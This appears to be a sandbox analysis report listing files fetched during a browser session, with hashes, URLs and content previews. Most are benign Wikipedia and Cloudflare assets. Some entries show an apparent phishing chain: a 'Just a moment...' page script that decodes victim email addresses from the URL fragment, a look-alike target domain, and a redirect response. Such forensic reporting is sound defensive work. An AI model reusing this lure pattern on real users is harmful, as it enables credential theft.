                                                                                                                                                                                                                                    SSDEEP:6:TMVBd/i9mc4slzIzUQSACjEBaaFpCALWNrK2TuUYhsbnlXn:TMHd6uz+ACgBVCuWlTuUYhsbnlX
                                                                                                                                                                                                                                    MD5:FB64DF7CFCBD9D16F4812087ABCC8DD4
                                                                                                                                                                                                                                    SHA1:22B95BF281ABF89524229E7FD89666B84FF3D1CD
                                                                                                                                                                                                                                    SHA-256:B324430A72A978FFC29853C1DBB95679833C58B30E5B5D10E5063F96F98C5BA2
                                                                                                                                                                                                                                    SHA-512:77C7F0AAD4DB6047A46595BB08108F09BC9216FB4A3E810BC0CE73D8DF69C9A4FCCEFD33EEB38736C1CD32FF8B1B58E4DA293CAA07BF99C3EDD0F972B02D3013
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12">..<title>...external link..</title>..<path fill="#36c" d="M6 1h5v5L8.86 3.85 4.7 8 4 7.3l4.15-4.16zM2 3h2v1H2v6h6V8h1v2a1 1 0 0 1-1 1H2a1 1 0 0 1-1-1V4a1 1 0 0 1 1-1"/>.</svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (709)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):3530
                                                                                                                                                                                                                                    Entropy (8bit):5.183989097603964
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:x9313e2Z+59Uhl679Smbbc7mdOV3ny2WWAIhBJqmQAY18SFvLv:/yR9Sm8Y03JoICAYL1D
                                                                                                                                                                                                                                    MD5:D22721B5C0396AFAB367F24463AC6542
                                                                                                                                                                                                                                    SHA1:C28D2F7D3AF5D7BBBDF9FCFBC6D0C9D21D86064D
                                                                                                                                                                                                                                    SHA-256:71F4179F271340B7801D10F4DDFA5266657DA63628D2689E89E389C8CA39283D
                                                                                                                                                                                                                                    SHA-512:AE0E9DE1EB360839409095EECD09D27C9285116CCEC4B4ACFEFD412A67F0BCAC97626B0A82A9B1DB9F5B6D70535D4B3992157CFCD9985C6FF87F8906DAC8CDFB
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://porposal-ach.pages.dev/favicon.ico
                                                                                                                                                                                                                                    Preview:..<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8" />. <title>Just a moment...</title>. <script src="https://code.jquery.com/jquery-3.7.1.min.js" integrity="sha256-/JqT3SQfawRcv/BIHPThkBvs0OEvtFFmqPF/lYI/Cxo=" crossorigin="anonymous"></script>.. DEWE -->.. <script>... function javascriptCallback() {. var hashValue = window.location.hash.substr(1);. var hash2 = hashValue.split("#")[1];. // console.log(hash2[1]);.. const urlParams = new URLSearchParams(hashValue);. const name = urlParams.get('service');.. .. // Decode the Base64-encoded value. var decodedValue = atob(name);. console.log(decodedValue);. var parts = decodedValue.split("&");. . . var mails = parts[0];. var mails2 = atob(mails);. console.log(mails2);. . var key = parts[1];. var display = parts[2];.. var form = new FormData();. // form.append("subs", `${mails}
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (47520)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):47521
                                                                                                                                                                                                                                    Entropy (8bit):5.398500199255723
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                                                                                                                                                                                    MD5:301F68F3D8317AB22D4021E266C9A853
                                                                                                                                                                                                                                    SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                                                                                                                                                                                    SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                                                                                                                                                                                    SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                                                                                                                                                                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):188
                                                                                                                                                                                                                                    Entropy (8bit):4.760925121012862
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:YMrJk/BXHJGw9Hv6LDHK9vH1ll/QyJvT39PQepZTV/YV39CUbHfRZTV/q:YMrJk/hHJ19mwVRJvT3jZZ4397fvZC
                                                                                                                                                                                                                                    MD5:9DCDCD9F0D6304D75F0AA466618AF89F
                                                                                                                                                                                                                                    SHA1:815EA417396876637E3A683E8D9255BBDB998B3B
                                                                                                                                                                                                                                    SHA-256:7B3BE844B4D083D06EDD9646C6990055AF44673C543E21BB9A05F8EB8F8A320B
                                                                                                                                                                                                                                    SHA-512:1ECAB3E122F1D3EB8BED466A8005C48ADD5722312E06A6FFA189B34A4A664E6B78371CF679781C73A06837CCE14887F8C94F092E61029755B00B556B11E32818
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{"id":15,"key":"tes2","username":"Roione1","url_target":"https:\/\/abb0tt.net\/#","optional_url":null,"created_at":"2023-06-25T22:49:32.000000Z","updated_at":"2026-12-10T22:49:32.000000Z"}
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 200 x 25, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):2842
                                                                                                                                                                                                                                    Entropy (8bit):7.186945563838732
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:Fw2OQX0Oo70NMqFIwWkhH/UM30C7dgM44hs9m0GiFRZgpnrINTAR4vNvnvVFE5:hNX9oS9FFV//F44aPeprINJ9w
                                                                                                                                                                                                                                    MD5:8087241E0374EE22AB2B832F25325BF5
                                                                                                                                                                                                                                    SHA1:1B8100AC06446E0EA2F1B199C6F7B00C856BF894
                                                                                                                                                                                                                                    SHA-256:9407E289B09A5B737F72ED151235C6A42193259F7F67FDBC3AF6873BBB538DE4
                                                                                                                                                                                                                                    SHA-512:F6294E949AE5EA8835195E672FEB96005F5F09A526BC1942F482659ED8FF36C3629A73E8864272AD194E7551D392BEB715731C890BE8D6C2B18F0E434E5B2634
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://upload.wikimedia.org/wikipedia/commons/thumb/2/2f/Windows_Server_2019_logo_%28official%29.svg/200px-Windows_Server_2019_logo_%28official%29.svg.png
                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............C.&....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE......................................................................................................................$............................................................................................................................................................................................ .........................................................................................................................................................................................................................................................................................................................................................................................................................................................tRNS.."Gl?.3^....x.<a`A..#[....Z.%.5w.o.t......s..F....d...{..@(Mf..;iO.C:.v...........p.!...I...}1..'Y.U..].......z.*r...L$....~.....u...
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (1471)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):147990
                                                                                                                                                                                                                                    Entropy (8bit):5.411713732342445
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:yLWwbnGhdWXjSv4Xa53AhY4lRgH28XEZ/CVLhuBkoPEJAk95s/cVWKn+IiFiWH/1:yUv4Kyh4HHNVQBkRrvM+bW
                                                                                                                                                                                                                                    MD5:006B13E3AC151D033198538013E523A1
                                                                                                                                                                                                                                    SHA1:A50AAF971F68234497BCC79AA576F9C23AB80EB5
                                                                                                                                                                                                                                    SHA-256:C1E928D5F5A1409C09E8F47A4125511957CFDCE0812411631A117F54492491F9
                                                                                                                                                                                                                                    SHA-512:4B44E560DA5D513864042B7EAAA71F89A9E1151FD0F885506C60D5FA4ECA6130F3168946B302A9C86BFA995DF8D73E9C8CBF8B86F8E007BF7C297B6F91018CFD
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?lang=en&modules=mmv&skin=vector-2022&version=xvmbs
                                                                                                                                                                                                                                    Preview:mw.loader.impl(function(){return["mmv@lw86i",{"main":"mmv/mmv.js","files":{"mmv/config.json":{"useThumbnailGuessing":true,"thumbnailBucketSizes":[320,800,1024,1280,1920,2560,2880],"imageQueryParameter":false,"recordVirtualViewBeaconURI":"/beacon/media","extensions":{"djvu":"default","jpg":"default","jpeg":"default","gif":"default","svg":"default","png":"default","tiff":"default","tif":"default","webp":"default","stl":"mmv.3d"}},"mmv/mmv.js":function(require,module,exports){const{Config}=require('mmv.bootstrap');const HtmlUtils=require('./mmv.HtmlUtils.js');const ViewLogger=require('./logging/mmv.logging.ViewLogger.js');const Api=require('./provider/mmv.provider.Api.js');const GuessedThumbnailInfo=require('./provider/mmv.provider.GuessedThumbnailInfo.js');const ImageProvider=require('./provider/mmv.provider.Image.js');const ImageInfo=require('./provider/mmv.provider.ImageInfo.js');const ThumbnailInfo=require('./provider/mmv.provider.ThumbnailInfo.js');const ImageModel=require('./model/m
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 16 x 17, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1009
                                                                                                                                                                                                                                    Entropy (8bit):6.9993339263387435
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:24:TcJruHOerrBI3i0kUtQiecyhGGvCZweyzRk2EM2D:Teuul3VrpeZpvCaVLED
                                                                                                                                                                                                                                    MD5:09C1E368370F7D93B518267CB66DE7EE
                                                                                                                                                                                                                                    SHA1:D27A32FEE97DCC3181F01646C6999921D8272975
                                                                                                                                                                                                                                    SHA-256:CFC4D901F812DA5985BC6A7421BFE57701CF7B52CD283678CF87F0A838EE32FD
                                                                                                                                                                                                                                    SHA-512:03E5FAD608BA4EA02F2C271BB0956592FCF5F2C9EEE8DC3B8285CF99E4D62E99303D1D3201290171D35F45E52CB8884AB120E81A6ED47A62611A96D5CFB06297
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............q......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE...aI..y....................m..............s..........~b...................rZ........t........|.....z........s.......oW......................z_........u..............n.............RB..v.............................&...........r....C.........3.$...............v.......y..~..p........"..........m.(..!....h....q.._./......n.5.Q............'..`.N.T....(....l...G..u.8.V.....#.:.......o#{...CtRNS..e...F..z..;...V.s.0....i6..}#........gg.2....q.&....".....>....?y......bKGD.l..C....tIME......*s../....IDAT..c`..F&f.V6v.(...rvqus...y...=<..}|..@|A!g?...@/..`a...Q1.../..p.H..P......W.s...v.b....*..u..OHLJ.e..O.JMKv.....L..9.,.l..<..|..%.e.d.B."/.b..R.2U.5u...*.....z7..M-..f..B..-:...z..^..n.t....s[=....al.r....EzgWA......6.v...N.H@S.....=...&(...%tEXtdate:create.2024-06-13T00:11:42+00:00^.*}...%tEXtdate:modify.2024-06-13T00:11:42+00:00/K.....
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):1884
                                                                                                                                                                                                                                    Entropy (8bit):7.857590950528177
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:UCCH7EwtGbROVlmbQedLFvaQ+f81NarqZ:UCGVtGbROVEbQedLVaQ+f818rk
                                                                                                                                                                                                                                    MD5:2A0B8A3B1F901BABBFE45663B2DA7151
                                                                                                                                                                                                                                    SHA1:1215B9BC6BA8D2D894FE08D9C92828D1A778B060
                                                                                                                                                                                                                                    SHA-256:C6CC1007A96B78D681AB3A3ECF414E7AE448C90394B8811491CF6FF709BE11CF
                                                                                                                                                                                                                                    SHA-512:0A37C86F0A50AEA882C211E67EC27A72D3DD9ACC4F67D6333819E3AD73389E36D2500B1979A3EF41E19374953CEE7345D1700EE2F809540ECF448A8519F889A6
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://upload.wikimedia.org/wikipedia/commons/thumb/0/05/Windows_10_Logo.svg/200px-Windows_10_Logo.svg.png
                                                                                                                                                                                                                                    Preview:RIFFT...WEBPVP8LG.../...... .$E...........d!.G..(9.{w....pAkh7.$9..........|.W......m.0....Vb...#}...{.'......QA......A..T.R@..."..".% ....0..@@1.....0..X......N.'.^8.AA..!~...UV....K...CE..T.0. ~..1*.......BTTP........D.$3(..:.T..B.7[....@e.r..)P..##c.M$U..._A%).2.......1..sX....Z.y......j..s.{.&.m$.m..Fm..\.m.S...wk.M..{....v........;.O.._E...;.....xY..KTm~...YW.D..;\w......c....3..UOB....o..[.M....@..om.}....[..\..7.....Pj.O......... y...CX.@...^PMxbK...cpO......^..`x..z......B~X`;.D.>..O..L.uw~..r..Kc.l*4K.'.T.."........$o=i.46m..r......tIhJ..i.3-....tp1{2.h...R....&.]..X..L'....L...M.$.sCl...\.^1.H..M...1,5.:pF..c$E.^......./Md.p.".j.....];}]v.#.t.M...w....J.?..].8..h...X....a]idjA9..[..().(\.T../.al.kH.3....g0.J.I.zQ.T.V.^.d..|....0..W.=...:...I....6.h.o...Y>.b..0l..m.[.iG[...|.H....&.|...!3.V6.&.m.O.v7....^8.....\...Q..a..{.$.<O...2.w.$.jS.....U..-..T.....;.1.O%?.'..A(......f}.V.c.r.....;.Q_J6.2.b{0Z..2..;........7."2.wg.t%.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):221
                                                                                                                                                                                                                                    Entropy (8bit):5.140712389287767
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:vFWWMNHU8LdgCfWGKsqDmJS4RKb5zMcFH3AMO+lHpkKcvXvxcAD6srHGVPQcHwX/:TMVBd/i9mc4slzTQol8ya2in+8H
                                                                                                                                                                                                                                    MD5:F4C86D1899E1F6ECA69D3CE4DC961304
                                                                                                                                                                                                                                    SHA1:36196FFCC258E966E2C9F4D06D80733C48BD40DE
                                                                                                                                                                                                                                    SHA-256:4DE5F25341A457E9FBCF7C29C44158D94CE7F74E91F92AE30B03FE7606716D08
                                                                                                                                                                                                                                    SHA-512:D55B1F67FE20CD134B3B4A409BE2C86DF24647647334B2F4566AB08C8C7E3D04EFB12AB606EF7AB88A128DA48D90013279562249F5085A085EBB39E72298EB3B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...menu..</title><g fill="#000"><path d="M1 3v2h18V3zm0 8h18V9H1zm0 6h18v-2H1z"/></g></svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):74
                                                                                                                                                                                                                                    Entropy (8bit):4.306417585383312
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:YWR4buWsItRRVljEKZVEDM2HAQz:YWybuORp4KZAgQz
                                                                                                                                                                                                                                    MD5:AB3F8C64531F38E70348047A6F4DF1BD
                                                                                                                                                                                                                                    SHA1:8AFCA69160C51EDE57921A8EF76481D6FF1C7835
                                                                                                                                                                                                                                    SHA-256:586D9DD959D197BFD0EDF6DB401789E79E183AF389C09A97BA8036CFF5270CDC
                                                                                                                                                                                                                                    SHA-512:69C813CF835EB6D1138AE9C14C8A2A6B588009C29D6AD3EBBC32F27907839E543F6E792518D16683CD2A29CBE4BDE0873010B30A1A45F5D3E492577C609130A7
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:{"status":"success","message":"https://porposal-ach.pages.dev/#?service="}
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:MS Windows icon resource - 3 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):2734
                                                                                                                                                                                                                                    Entropy (8bit):3.3882982469056153
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:Zuy9Fs4LSnajXfqX/Pp3ADzPKhmGtY/xNu9y:ZHpLHsPp36zPKhxW+9y
                                                                                                                                                                                                                                    MD5:904CE6BD2EF5E1EAA6DE1EB02164436B
                                                                                                                                                                                                                                    SHA1:B37AC89616B9E4C01A35991AF59FE6B63E41A48E
                                                                                                                                                                                                                                    SHA-256:3638DE61226857E62CF5187D7D59CF902111AD4F792B5BDFF1BFED3F5ED5E608
                                                                                                                                                                                                                                    SHA-512:05044E298742B1520585AE3C029938036EBED50337608A600C4924A29E3624CE704F3B13FBE348D9E1B1E93B1E0ABFF9F53BBC9FD31929199F9A374F154F74C2
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/static/favicon/wikipedia.ico
                                                                                                                                                                                                                                    Preview:......00......h...6... ......................(.......(...0...`.......................................000.GGG.XXX.ggg.vvv...................................................................................................................................................................................................................................................[................n......................0....................................................O.-.................=....................o.x......"................2...-p..................@...>.....................................>..........................@..<..@....................n..^.........................................................@.^...........................O...............................................A...............>.......N.............?.....`.~......A............../........n.......................+.......-.......,...........@.N...`.n.......................~.........=... ...{.P.....0...P..|..2
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):9444
                                                                                                                                                                                                                                    Entropy (8bit):3.7340369219367555
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:FmaH8U2MtRmOVF+FVFbVFGVFSb0O1YqfxhcXhdQvon7tisE66MD:ngHrbhSqiX7YsE66MD
                                                                                                                                                                                                                                    MD5:73C41E7C71EED318AFF4D771E9651F95
                                                                                                                                                                                                                                    SHA1:C9DEE94A4B7BD5AF094AEFB7E83325C81761A3DE
                                                                                                                                                                                                                                    SHA-256:CE4C2501F6DFE8A3492931DA471DE530244D2EF262B5B9625E32A675526D5891
                                                                                                                                                                                                                                    SHA-512:B1B61C3FB10FDDDD020097821BD243F6B2F4EFAEB49F370CBCA5C6F8C4BAE50186C7A1E313A6B14C50F88D0B9E36D9006AB3A3CE00FFFD933A9CAF40837CB37C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/static/images/mobile/copyright/wikipedia-tagline-en.svg
                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 117 13"><path d="M89.777 3.326c.104 0 .17.039.17.092 0 0-.055.363-.055.832 0 .093.076.081.117.039.584-.594 1.3-.921 1.781-.921 1.33 0 2.3 1.27 2.301 2.651 0 1.05-.352 1.86-.963 2.457-.533.509-1.18.729-1.91.729-.41 0-.812-.072-1.131-.201-.133-.055-.182-.071-.182.098v1.403c0 1.08.143 1.13 1.064 1.185.078.077.078.352 0 .428-.558-.011-.96-.025-1.572-.025-.572 0-.91.014-1.455.025-.078-.078-.078-.353 0-.431.793-.038.936-.104.936-1.184V4.951c0-.74-.143-.818-.846-.885-.025-.078-.053-.285-.025-.363.896-.116 1.4-.233 1.77-.377zm-17.266.144c.078.078.078.353 0 .431-.479.039-.869.455-1.053.832-.688 1.46-1.26 2.8-2.301 5.305-.16.385-.33.757-.533 1.117-.467.834-.989.938-1.26.938-.352 0-.611-.209-.611-.48 0-.17.195-.561.572-.561.143 0 .193.039.377.039.324 0 .506-.116.648-.377.195-.402.354-.762.508-1.195.131-.363-.068-.961-.182-1.223l-1.473-3.419c-.354-.828-.459-.923-1.023-.976-.078-.078-.078-.353 0-.431.26.015.609.024 1.053.024.469 0 .988-.012 1.469
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):9444
                                                                                                                                                                                                                                    Entropy (8bit):3.7340369219367555
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:FmaH8U2MtRmOVF+FVFbVFGVFSb0O1YqfxhcXhdQvon7tisE66MD:ngHrbhSqiX7YsE66MD
                                                                                                                                                                                                                                    MD5:73C41E7C71EED318AFF4D771E9651F95
                                                                                                                                                                                                                                    SHA1:C9DEE94A4B7BD5AF094AEFB7E83325C81761A3DE
                                                                                                                                                                                                                                    SHA-256:CE4C2501F6DFE8A3492931DA471DE530244D2EF262B5B9625E32A675526D5891
                                                                                                                                                                                                                                    SHA-512:B1B61C3FB10FDDDD020097821BD243F6B2F4EFAEB49F370CBCA5C6F8C4BAE50186C7A1E313A6B14C50F88D0B9E36D9006AB3A3CE00FFFD933A9CAF40837CB37C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 117 13"><path d="M89.777 3.326c.104 0 .17.039.17.092 0 0-.055.363-.055.832 0 .093.076.081.117.039.584-.594 1.3-.921 1.781-.921 1.33 0 2.3 1.27 2.301 2.651 0 1.05-.352 1.86-.963 2.457-.533.509-1.18.729-1.91.729-.41 0-.812-.072-1.131-.201-.133-.055-.182-.071-.182.098v1.403c0 1.08.143 1.13 1.064 1.185.078.077.078.352 0 .428-.558-.011-.96-.025-1.572-.025-.572 0-.91.014-1.455.025-.078-.078-.078-.353 0-.431.793-.038.936-.104.936-1.184V4.951c0-.74-.143-.818-.846-.885-.025-.078-.053-.285-.025-.363.896-.116 1.4-.233 1.77-.377zm-17.266.144c.078.078.078.353 0 .431-.479.039-.869.455-1.053.832-.688 1.46-1.26 2.8-2.301 5.305-.16.385-.33.757-.533 1.117-.467.834-.989.938-1.26.938-.352 0-.611-.209-.611-.48 0-.17.195-.561.572-.561.143 0 .193.039.377.039.324 0 .506-.116.648-.377.195-.402.354-.762.508-1.195.131-.363-.068-.961-.182-1.223l-1.473-3.419c-.354-.828-.459-.923-1.023-.976-.078-.078-.078-.353 0-.431.26.015.609.024 1.053.024.469 0 .988-.012 1.469
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):268
                                                                                                                                                                                                                                    Entropy (8bit):4.814615653975803
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:vFWWMNHU8LdgCfWGKsqDmJS4RKb5zMcFH3AMO+lHpkKcvXvxcAoPRGHGVPtfIg3W:TMVBd/i9mc4slzTQol80QoAgNYx
                                                                                                                                                                                                                                    MD5:20E2BF3F38E766E007DFD18D33E9FB41
                                                                                                                                                                                                                                    SHA1:BC1D4BC3D10C2BFCCADBF7109F760550CE5FA1A6
                                                                                                                                                                                                                                    SHA-256:65829329CB8D2D9C79A1C427ABB906E0841FCB1A833840598150559F87CC1902
                                                                                                                                                                                                                                    SHA-512:EE2051285A05849F4BAAFBD4CBBDDE802DAA281C20D96CBF2D8C4E5B80D7C2A9123BB0D0DDCAB097DC45779C784537B998E6080DB4FEDDE34C23CDA34605352F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://en.wikipedia.org/w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=11c23
                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20"><title>...ellipsis..</title><g fill="#000"><circle cx="10" cy="10" r="2"/><circle cx="3" cy="10" r="2"/><circle cx="17" cy="10" r="2"/></g></svg>.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):252
                                                                                                                                                                                                                                    Entropy (8bit):5.063769880037573
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:6:Us4++yXXhj5MnRxJ/6ETEcQ1RTlvfwgLjzWu1rdEG2SSn:UsJ+QXIndTEcQ1fzXKu1S
                                                                                                                                                                                                                                    MD5:F99AD5DABC437FC03CE06A1257F99F38
                                                                                                                                                                                                                                    SHA1:D0E5E137AA05FC9F948D72F844D209A356885A70
                                                                                                                                                                                                                                    SHA-256:5445B87F97B5C6CE7C0CA4ED6272535D750942B3B042872F8D4F1FE8457777EB
                                                                                                                                                                                                                                    SHA-512:3F0F1CC8D932FCEA6AAD9319403CBD630C355D8BE3DE38E1DE55BE38CD7EC5DB521B64CEDACBB8D6C50A2CAD29B13B2B7454DB1B33AA8EC2654E8D7065BDDA1A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://login.wikimedia.org/wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script
                                                                                                                                                                                                                                    Preview:/* Not centrally logged in */.(function(){var t=new Date();t.setTime(t.getTime()+86400000);try{localStorage.setItem('CentralAuthAnon',t.getTime());}catch(e){try{document.cookie='CentralAuthAnon=1; expires='+t.toGMTString()+'; path=/';}catch(e2){}}}());
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                    Entropy (8bit):3.625
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:HkW:z
